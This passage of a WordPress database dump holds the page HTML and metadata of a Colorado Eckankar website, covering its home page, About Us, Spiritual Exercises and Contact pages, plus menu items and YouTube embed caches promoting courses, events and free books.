data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-weight: 600;\" data-font-weight=\"600\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','publish','closed','closed','','home','','','2023-11-21 09:31:13','2023-11-21 16:31:13','',0,'https://eckankar-colorado.org/home/',0,'page','',0),(7161,2,'2019-07-05 21:40:56','2019-07-05 21:40:56',' ','','','publish','closed','closed','','7161','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/7161/',1,'nav_menu_item','',0),(7162,2,'2019-07-05 21:40:56','2019-07-06 03:40:56','<div class=\"tmpl-call_to_action-4 boldgrid-section dynamic-gridblock background-fixed\" style=\"background-image: linear-gradient(to left, rgba(255, 255, 255, 0.28), rgba(255, 255, 255, 0.28)), url(\'https://eckankar-colorado.org/wp-content/uploads/2021/10/rockies-4.jpg\'); background-size: cover; background-position: 50% 71%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2021/10/rockies-4.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.28)\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-4\" style=\"background-color: rgba(234, 234, 234, 0.58);\">\r\n<div class=\"bg-box-cover bg-background-color bg-box\" style=\"padding: 10%; margin-top: 15px; background-color: rgba(255, 255, 255, 0.7); color: #333333;\">\r\n<h2 class=\"h1\" style=\"margin: 30px 0px; font-family: Raleway; font-weight: 500; color: #1d5791; text-transform: capitalize;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">About Us</h2>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"margin-top: -39px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"bg-hr\" style=\"border: 2px solid; margin-left: 0px; color: #1d5791;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"font-size: 16px; color: #494949;\">The information herein is to help awaken the knowledge of spiritual experiences for individuals just like you and me. Members of Eckankar, The Path of Spiritual Freedom, have found that through the Spiritual Exercises of Eckankar, they are able to access the Holy Spirit in their daily life.</p>\r\n<p class=\"\" style=\"font-size: 16px; margin-top: 17px;\">This website offers information on the ECKANKAR teachings and ECK activities throughout Colorado. These include introductory events, book discussions, ECK Light and Sound Services, regional seminars, classes, and a variety of of other events.</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-7 col-sm-6 col-xs-2\"></div>\r\n</div>\r\n</div>\r\n</div>','About Us','','publish','closed','closed','','about-us','','','2021-10-27 10:03:26','2021-10-27 16:03:26','',0,'https://eckankar-colorado.org/about-us/',0,'page','',0),(7163,2,'2019-07-05 21:40:56','2019-07-05 21:40:56',' ','','','publish','closed','closed','','7163','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/7163/',12,'nav_menu_item','',0),(7172,2,'2019-07-05 21:40:56','2019-07-06 03:40:56','<div class=\"tmpl-call_to_action-4 boldgrid-section dynamic-gridblock background-fixed\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2019/07/spex-intropix-1.jpg\'); background-size: cover; background-position: 50% 50%; width: auto;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/spex-intropix-1.jpg\">\r\n<div class=\"col-md-7 col-sm-6 col-xs-2\"></div>\r\n<div class=\"col-md-4 col-sm-6 col-xs-10\">\r\n<div class=\"bg-box-cover bg-background-color bg-box\" style=\"padding: 56px 10%; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d; margin-right: -15px;\">\r\n<h2 class=\"\" style=\"color: #23507d;\">Spiritual Exercises</h2>\r\n<div class=\"row bg-editor-hr-wrap\" style=\"margin-top: -11px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"bg-hr\" style=\"border: 2px solid; margin-left: 0px; color: #23507d;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"font-size: 16px;\">Eckankar teaches simple spiritual exercises to experience the Light and Sound of God. These exercises also help us Soul Travel, to move into greater states of consciousness.</p>\r\n<p class=\"\" style=\"font-size: 16px;\">You can use these spiritual exercises to find answers to your questions about this life and the afterlife.</p>\r\n<p class=\"\" style=\"font-size: 16px;\">Spiritual exercises are a treasure whose value we might overlook because of their simplicity.</p>\r\n<p class=\"\" style=\"font-size: 16px;\">A spiritual exercise can be as simple as relaxing and singing the word HU , an ancient name for God. As we practice these spiritual exercises, we learn to recognize the presence of the Holy Spirit in our lives. We learn that each of us is Soul, a spark of God sent to this world to gain spiritual experience.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\" style=\"padding-top: 13px;\">\r\n<div class=\"col-md-12 text-center col-xs-12 col-sm-12 text-center\">\r\n<h2 class=\"\" style=\"color: #23507d;\">try one of the spiritual exercises below</h2>\r\n<h4 class=\"bg-font-family-alt\" style=\"text-transform: none;\">Just as physical exercise helps you build physical vitality, spiritual exercises help you build spiritual vitality.<br>\r\nThe doorway to spiritual freedom, self-mastery, wisdom, and love can be yours through daily practice of these and other spiritual exercises.</h4>\r\n<p class=\"\" style=\"font-size: 18px;\">For more information on The Spiritual Exercises of ECK, <a href=\"https://www.eckankar.org/spex.html\" target=\"_blank\" rel=\"noopener noreferrer\">go here</a>.</p>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\" style=\"padding-bottom: 22px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>[WPSM_AC id=43187]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Exercises','','publish','closed','closed','','spiritual-exercises','','','2021-04-14 11:18:22','2021-04-14 17:18:22','',0,'https://eckankar-colorado.org/info/',0,'page','',0),(7173,2,'2019-07-05 21:40:56','2019-07-05 21:40:56',' ','','','publish','closed','closed','','7173','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/7173/',6,'nav_menu_item','',0),(7174,2,'2019-07-05 21:40:56','2019-07-06 03:40:56','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n<p>[ninja_form id=13]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Contact Us','','publish','closed','closed','','contact-us','','','2019-10-18 20:15:16','2019-10-19 02:15:16','',0,'https://eckankar-colorado.org/contact-us/',0,'page','',0),(8623,2,'2019-07-07 15:09:29','2019-07-07 21:09:29','<iframe title=\"City at Night\" width=\"780\" height=\"439\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>','','','publish','closed','closed','','1f72b9b20df6dad278506c9cdf9fe828','','','2019-07-07 15:09:29','2019-07-07 21:09:29','',0,'https://eckankar-colorado.org/1f72b9b20df6dad278506c9cdf9fe828/',0,'oembed_cache','',0),(8624,2,'2019-07-07 15:09:29','2019-07-07 21:09:29','<iframe title=\"City at Night\" width=\"391\" height=\"220\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>','','','publish','closed','closed','','0c9cbe354d9dd68224aff14834faa928','','','2019-07-07 15:09:29','2019-07-07 21:09:29','',0,'https://eckankar-colorado.org/0c9cbe354d9dd68224aff14834faa928/',0,'oembed_cache','',0),(10251,2,'2019-07-07 20:55:34','2019-07-08 02:55:34','<iframe title=\"City at Night\" width=\"1120\" height=\"630\" src=\"https://www.youtube.com/embed/5LxGNTTxPis?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>','','','publish','closed','closed','','f4b87f55ecaa50ae301514e310820561','','','2019-07-07 20:55:34','2019-07-08 02:55:34','',0,'https://eckankar-colorado.org/f4b87f55ecaa50ae301514e310820561/',0,'oembed_cache','',0),(15203,2,'2019-07-11 21:07:46','2019-07-12 03:07:46','','Front Page Tabs-wpwidgit','','publish','closed','closed','','front-page-tabs-wpwidgit','','','2019-07-14 14:39:50','2019-07-14 20:39:50','',0,'https://eckankar-colorado.org/?post_type=rtbs_tabs&#038;p=15203',0,'rtbs_tabs','',0),(15806,2,'2019-07-11 21:25:45','2019-07-12 03:25:45','','Upcoming ECK Events','','publish','closed','closed','','front-page-tabs-tabs-wpshopmart','','','2021-05-10 13:31:58','2021-05-10 19:31:58','',0,'https://eckankar-colorado.org/?post_type=tabs_responsive&#038;p=15806',0,'tabs_responsive','',0),(21690,2,'2019-07-15 12:49:49','2019-07-15 18:49:49','','eck-logo-gray-sm','','inherit','open','closed','','eck-logo-gray-sm','','','2019-07-15 12:49:49','2019-07-15 18:49:49','',7160,'https://eckankar-colorado.org/wp-content/uploads/2019/07/eck-logo-gray-sm.png',0,'attachment','image/png',0),(25071,2,'2019-07-16 19:26:20','2019-07-17 